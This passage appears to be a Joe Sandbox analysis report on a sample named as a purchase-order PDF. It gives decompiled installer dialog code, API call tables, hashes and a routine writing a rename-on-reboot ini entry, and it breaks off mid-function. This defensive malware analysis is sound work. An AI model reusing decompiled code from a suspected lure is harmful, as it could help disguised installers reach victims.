0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

, xrefs: 004055FF
N, xrefs: 004052C6
M, xrefs: 004051E5

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0xffffffff
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0xffffffff
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0xffffffff
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404453
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404524
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042b8
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
EnableWindow.USER32(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32(00000000), ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H7B
API String ID: 1860320154-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

Fosklcks, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Fosklcks$N
API String ID: 3103080414-589444622
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
